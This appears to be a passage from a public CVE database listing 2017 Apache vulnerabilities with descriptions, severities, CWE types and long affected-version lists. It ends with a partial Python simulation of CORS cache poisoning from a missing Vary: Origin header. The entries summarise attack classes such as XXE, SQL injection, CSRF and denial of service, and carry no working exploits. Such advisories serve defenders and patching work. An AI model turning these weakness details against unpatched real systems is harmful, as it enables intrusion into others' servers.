apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 6.0.6
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 8.0.41
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 6.0.10
apache tomcat 8.5.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.5.12
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 6.0.40
apache tomcat 7.0.26
apache tomcat 6.0.49
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 8.0.38
apache tomcat 7.0.76
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 6.0.9
apache tomcat 8.0.2
apache tomcat 6.0.48
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
apache tomcat 6.0.35
CVE-2017-5648 MEDIUM

While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 8.0.40
apache tomcat 8.5.4
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 8.5.11
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 8.5.7
apache tomcat 8.0.32
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.75
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 8.0.41
apache tomcat 7.0.20
apache tomcat 8.5.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 8.0.38
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2017-5649 MEDIUM

Apache Geode before 1.1.1, when a cluster has enabled security by setting the security-manager property, allows remote authenticated users with CLUSTER:READ but not DATA:READ permission to access the data browser page in Pulse and consequently execute an OQL query that exposes data stored in the cluster.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-5650 MEDIUM

In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the handling of an HTTP/2 GOAWAY frame for a connection did not close streams associated with that connection that were currently waiting for a WINDOW_UPDATE before allowing the application to write more data. These waiting streams each consumed a thread. A malicious client could therefore construct a series of HTTP/2 requests that would consume all available processing threads.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-404,

Products Affected

Vendor Product Version
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.5.4
apache tomcat 8.5.10
apache tomcat 8.5.1
apache tomcat 8.5.6
apache tomcat 8.5.12
apache tomcat 8.5.11
apache tomcat 8.5.5
apache tomcat 8.5.8
apache tomcat 9.0.0
apache tomcat 8.5.0
apache tomcat 8.5.3
apache tomcat 8.5.7
CVE-2017-5651 HIGH

In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If the send file processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could result in the same Processor being used for multiple requests which in turn could lead to unexpected errors and/or response mix-up.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.5.4
apache tomcat 8.5.10
apache tomcat 8.5.1
apache tomcat 8.5.6
apache tomcat 8.5.12
apache tomcat 8.5.11
apache tomcat 8.5.5
apache tomcat 8.5.8
apache tomcat 9.0.0
apache tomcat 8.5.0
apache tomcat 8.5.3
apache tomcat 8.5.7
CVE-2017-5652 MEDIUM

During a routine security analysis, it was found that one of the ports in Apache Impala (incubating) 2.7.0 to 2.8.0 sent data in plaintext even when the cluster was configured to use TLS. The port in question was used by the StatestoreSubscriber class which did not use the appropriate secure Thrift transport when TLS was turned on. It was therefore possible for an adversary, with access to the network, to eavesdrop on the packets going to and coming from that port and view the data in plaintext.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-319,

Products Affected

Vendor Product Version
apache impala 2.8.0
apache impala 2.7.0
CVE-2017-5653 MEDIUM

JAX-RS XML Security streaming clients in Apache CXF before 3.1.11 and 3.0.13 do not validate that the service response was signed or encrypted, which allows remote attackers to spoof servers.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache cxf *
CVE-2017-5654 MEDIUM

In Ambari 2.4.x (before 2.4.3) and Ambari 2.5.0, an authorized user of the Ambari Hive View may be able to gain unauthorized read access to files on the host where the Ambari server executes.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-91,

Products Affected

Vendor Product Version
apache ambari 2.4.0
apache ambari 2.4.1
apache ambari 2.5.0
CVE-2017-5655 MEDIUM

In Ambari 2.2.2 through 2.4.2 and Ambari 2.5.0, sensitive data may be stored on disk in temporary files on the Ambari Server host. The temporary files are readable by any user authenticated on the host.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ambari 2.4.0
apache ambari 2.2.2
apache ambari 2.4.1
apache ambari 2.4.2
apache ambari 2.5.0
CVE-2017-5656 MEDIUM

Apache CXF's STSClient before 3.1.11 and 3.0.13 uses a flawed way of caching tokens that are associated with delegation tokens, which means that an attacker could craft a token which would return an identifier corresponding to a cached token for another user.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-384,

Products Affected

Vendor Product Version
apache cxf *
CVE-2017-5657 MEDIUM

Several REST service endpoints of Apache Archiva are not protected against Cross Site Request Forgery (CSRF) attacks. A malicious site opened in the same browser as the archiva site may send an HTML response that performs arbitrary actions on archiva services, with the same rights as the active archiva session (e.g. administrator rights).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache archiva *
CVE-2017-5658 MEDIUM

The statistics generator in Apache Pony Mail 0.7 to 0.9 was found to be returning timestamp data without proper authorization checks. This could lead to derived information disclosure on private lists about the timing of specific email subjects or text bodies, though without disclosing the content itself. As this was primarily used as a caching feature for faster loading times, the caching was disabled by default to prevent this. Users using 0.9 should upgrade to 0.10 to address this issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache pony_mail *
CVE-2017-5659 MEDIUM

Apache Traffic Server before 6.2.1 generates a coredump when there is a mismatch between content length and chunked encoding.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2017-5660 MEDIUM

There is a vulnerability in Apache Traffic Server (ATS) 6.2.0 and prior and 7.0.0 and prior in the handling of the Host header with line folding. This can cause problems when interacting with upstream proxies, resulting in the wrong host being used.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
apache traffic_server 7.0.0
apache traffic_server 6.2.2
apache traffic_server 6.2.1
CVE-2017-5661 HIGH

In Apache FOP before 2.2, files lying on the filesystem of the server which uses FOP can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root, a full compromise of the server - including confidential or sensitive files - would be possible. XXE can also be used to attack the availability of the server via denial of service, as the references within an XML document can trivially trigger an amplification attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache formatting_objects_processor *
CVE-2017-5662 HIGH

In Apache Batik before 1.9, files lying on the filesystem of the server which uses Batik can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root, a full compromise of the server - including confidential or sensitive files - would be possible. XXE can also be used to attack the availability of the server via denial of service, as the references within an XML document can trivially trigger an amplification attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache batik *
CVE-2017-5663 MEDIUM

In Apache Fineract 0.4.0-incubating, 0.5.0-incubating, and 0.6.0-incubating, an authenticated user with client/loan/center/staff/group read permissions is able to inject malicious SQL into SELECT queries. The 'sqlSearch' parameter on a number of endpoints is not sanitized and appended directly to the query.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.5.0-incubating
apache fineract 0.6.0-incubating
apache fineract 0.4.0-incubating
CVE-2017-5664 MEDIUM

The error page mechanism of the Java Servlet Specification requires that, when an error occurs and an error page is configured for the error that occurred, the original request and response are forwarded to the error page. This means that the request is presented to the error page with the original HTTP method. If the error page is a static file, expected behaviour is to serve content of the file as if processing a GET request, regardless of the actual HTTP method. The Default Servlet in Apache Tomcat 9.0.0.M1 to 9.0.0.M20, 8.5.0 to 8.5.14, 8.0.0.RC1 to 8.0.43 and 7.0.0 to 7.0.77 did not do this. Depending on the original request this could lead to unexpected and undesirable results for static error pages including, if the DefaultServlet is configured to permit writes, the replacement or removal of the custom error page. Notes for other user provided error pages: (1) Unless explicitly coded otherwise, JSPs ignore the HTTP method. JSPs used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method. (2) By default, the response generated by a Servlet does depend on the HTTP method. Custom Servlets used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.0.42
apache tomcat 8.5.14
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 8.0.40
apache tomcat 8.5.4
apache tomcat 7.0.77
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 8.5.11
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 8.5.7
apache tomcat 8.0.32
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 8.0.19
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.75
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 8.0.43
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 8.0.41
apache tomcat 7.0.20
apache tomcat 8.5.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.5.12
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 8.5.13
apache tomcat 8.0.38
apache tomcat 7.0.76
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2017-6891 MEDIUM

Two errors in the "asn1_find_node()" function (lib/parser_aux.c) within GnuTLS libtasn1 version 4.10 can be exploited to cause a stack-based buffer overflow by tricking a user into processing a specially crafted assignments file via, e.g., the asn1Coding utility.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache bookkeeper 4.12.1
gnu libtasn1 4.10
debian debian_linux 8.0
CVE-2017-7659 MEDIUM

A maliciously constructed HTTP/2 request could cause mod_http2 in Apache HTTP Server 2.4.24, 2.4.25 to dereference a NULL pointer and crash the server process.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server 2.4.25
apache http_server 2.4.24
CVE-2017-7660 MEDIUM

Apache Solr uses a PKI based mechanism to secure inter-node communication when security is enabled. It is possible to create a specially crafted node name that does not exist as part of the cluster and point it to a malicious node. This can trick the nodes in cluster to believe that the malicious node is a member of the cluster. So, if Solr users have enabled BasicAuth authentication mechanism using the BasicAuthPlugin or if the user has implemented a custom Authentication plugin, which does not implement either "HttpClientInterceptorPlugin" or "HttpClientBuilderPlugin", his/her servers are vulnerable to this attack. Users who only use SSL without basic authentication or those who use Kerberos are not affected.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache solr 5.5.2
apache solr 6.4.0
apache solr 5.5.0
apache solr 6.2.0
apache solr 6.5.1
apache solr 6.2.1
apache solr 6.4.1
apache solr 6.0.0
apache solr 5.3.2
apache solr 6.3.0
apache solr 6.5.0
apache solr 6.1.0
apache solr 5.4.1
apache solr 6.4.2
apache solr 5.3.1
apache solr 6.0.1
apache solr 5.4.0
apache solr 5.5.3
apache solr 5.3.0
apache solr 5.5.4
apache solr 5.5.1
CVE-2017-7661 MEDIUM

Apache CXF Fediz ships with a number of container-specific plugins to enable WS-Federation for applications. A CSRF (Cross-Site Request Forgery) style vulnerability has been found in the Spring 2, Spring 3, Jetty 8 and Jetty 9 plugins in Apache CXF Fediz prior to 1.4.0, 1.3.2 and 1.2.4.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache cxf_fediz *
apache cxf_fediz 1.2.4
apache cxf_fediz 1.3.2
CVE-2017-7662 MEDIUM

Apache CXF Fediz ships with an OpenID Connect (OIDC) service which has a Client Registration Service, a simple web application that allows clients to be created, deleted, etc. A CSRF (Cross-Site Request Forgery) style vulnerability has been found in this web application in Apache CXF Fediz prior to 1.4.0 and 1.3.2, meaning that a malicious web application could create new clients, reset secrets, etc., while the admin user is logged on to the client registration service and the session is still active.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache cxf_fediz *
apache cxf_fediz 1.4.0
CVE-2017-7663 MEDIUM

Both global and Room chat are vulnerable to XSS attack in Apache OpenMeetings 3.2.0.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache openmeetings 3.2.0
apache openmeetings 3.2.1
CVE-2017-7664 HIGH

Uploaded XML documents were not correctly validated in Apache OpenMeetings 3.1.0.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache openmeetings 3.1.0
apache openmeetings 3.1.4
apache openmeetings 3.1.5
apache openmeetings 3.1.1
apache openmeetings 3.2.0
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
CVE-2017-7665 MEDIUM

In Apache NiFi before 0.7.4 and 1.x before 1.3.0, certain user input components in the UI guarded against some forms of XSS, but the guarding was insufficient.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache nifi 1.0.0
apache nifi 1.0.1
apache nifi 1.1.2
apache nifi *
apache nifi 1.2.0
apache nifi 1.1.1
apache nifi 1.1.0
CVE-2017-7666 MEDIUM

Apache OpenMeetings 1.0.0 is vulnerable to Cross-Site Request Forgery (CSRF) attacks, XSS attacks, clickjacking, and MIME-based attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-352,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7667 MEDIUM

Apache NiFi before 0.7.4 and 1.x before 1.3.0 does not set the response header that tells browsers to allow framing only from the same origin, leaving the UI open to clickjacking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-346,

Products Affected

Vendor Product Version
apache nifi 1.0.0
apache nifi 1.0.1
apache nifi 1.1.2
apache nifi *
apache nifi 1.2.0
apache nifi 1.1.1
apache nifi 1.1.0
CVE-2017-7668 MEDIUM

The HTTP strict parsing changes added in Apache httpd 2.2.32 and 2.4.24 introduced a bug in token list parsing, which allows ap_find_token() to search past the end of its input string. By maliciously crafting a sequence of request headers, an attacker may be able to cause a segmentation fault, or to force ap_find_token() to return an incorrect value.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-126,CWE-125,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_eus 7.6
netapp clustered_data_ontap -
redhat enterprise_linux_eus 7.4
apple mac_os_x 10.11.6
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.2
netapp storagegrid -
oracle secure_global_desktop 5.3
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
apple mac_os_x 10.12.6
apache http_server 2.4.25
apple mac_os_x *
apache http_server 2.4.24
netapp oncommand_unified_manager -
debian debian_linux 9.0
apache http_server 2.2.32
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
debian debian_linux 8.0
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_server 7.0
CVE-2017-7669 HIGH

In Apache Hadoop 2.8.0, 3.0.0-alpha1, and 3.0.0-alpha2, the LinuxContainerExecutor runs docker commands as root with insufficient input validation. When the docker feature is enabled, authenticated users can run commands as root.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache hadoop 2.8.0
apache hadoop 3.0.0
CVE-2017-7670 MEDIUM

The Traffic Router component of the incubating Apache Traffic Control project is vulnerable to a Slowloris style Denial of Service attack. TCP connections made on the configured DNS port will remain in the ESTABLISHED state until the client explicitly closes the connection or Traffic Router is restarted. If connections remain in the ESTABLISHED state indefinitely and accumulate in number to match the size of the thread pool dedicated to processing DNS requests, the thread pool becomes exhausted. Once the thread pool is exhausted, Traffic Router is unable to service any DNS request, regardless of transport protocol.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache traffic_control *
apache traffic_control 2.0.0
apache traffic_control 1.8.1
CVE-2017-7671 MEDIUM

There is a DOS attack vulnerability in Apache Traffic Server (ATS) 5.2.0 to 5.3.2, 6.0.0 to 6.2.0, and 7.0.0 with the TLS handshake. This issue can cause the server to coredump.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
apache traffic_server 7.0.0
CVE-2017-7672 MEDIUM

If an application allows a URL to be entered in a form field and the built-in URLValidator is used, it is possible to prepare a special URL which will overload the server process when the URL is validated. The solution is to upgrade to Apache Struts version 2.5.12.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.5
apache struts 2.5.5
apache struts 2.5.2
apache struts 2.5.8
apache struts 2.5.10.1
apache struts 2.5.1
apache struts 2.5.10
CVE-2017-7673 MEDIUM

Apache OpenMeetings 1.0.0 uses weak cryptographic storage, does not use a captcha in the registration and forgotten-password dialogs, and its authentication forms lack brute-force protection.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-307,CWE-326,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7674 MEDIUM

The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-345,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.0.42
apache tomcat 8.5.14
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.71
apache tomcat 8.0.40
apache tomcat 8.5.4
apache tomcat 7.0.77
apache tomcat 7.0.57
apache tomcat 8.5.11
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 7.0.43
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 8.5.7
apache tomcat 8.0.32
apache tomcat 8.0.44
apache tomcat 7.0.45
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 8.5.15
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 8.0.37
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 8.5.6
apache tomcat 8.0.23
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.75
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 8.0.34
apache tomcat 8.0.43
apache tomcat 8.0.21
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 8.0.29
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.46
apache tomcat 8.0
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 8.0.41
apache tomcat 8.5.10
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.5.12
apache tomcat 8.0.1
apache tomcat 7.0.66
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 8.5.13
apache tomcat 7.0.78
apache tomcat 8.0.38
apache tomcat 7.0.76
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 8.0.7
apache tomcat 8.5.3
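The cache-poisoning case described for CVE-2017-7674 is easy to reproduce in miniature. The following is an added example, not Tomcat's CORS filter or any code from the Apache project: it models a filter that reflects trusted Origins, a shared cache that keys entries on the request headers named in the response's Vary header, and three requesters hitting the same URL. The trusted origins, the URL and the requesters are constructed for the example. Without Vary: Origin the first requester's Access-Control-Allow-Origin value is served to everyone who follows; with it, each requester gets its own response.

```python
from typing import Callable, Dict, List, Optional, Tuple

# Origins the hypothetical application trusts (constructed for this example).
ALLOWED_ORIGINS = {"https://app.example", "https://admin.example"}


def cors_filter(origin: Optional[str], add_vary: bool) -> Dict[str, str]:
    """Response headers of a CORS filter that reflects trusted Origins.
    add_vary=False models the flawed filter: the Origin-dependent header is
    emitted without telling caches that the response varies on Origin."""
    headers = {"Content-Type": "application/json"}
    if origin in ALLOWED_ORIGINS:
        headers["Access-Control-Allow-Origin"] = origin
        headers["Access-Control-Allow-Credentials"] = "true"
    if add_vary:
        headers["Vary"] = "Origin"
    return headers


class SharedCache:
    """Minimal shared cache: a stored entry is reused only when the request
    carries the same values for every header named in that entry's Vary."""

    def __init__(self, backend: Callable[[Optional[str]], Dict[str, str]]):
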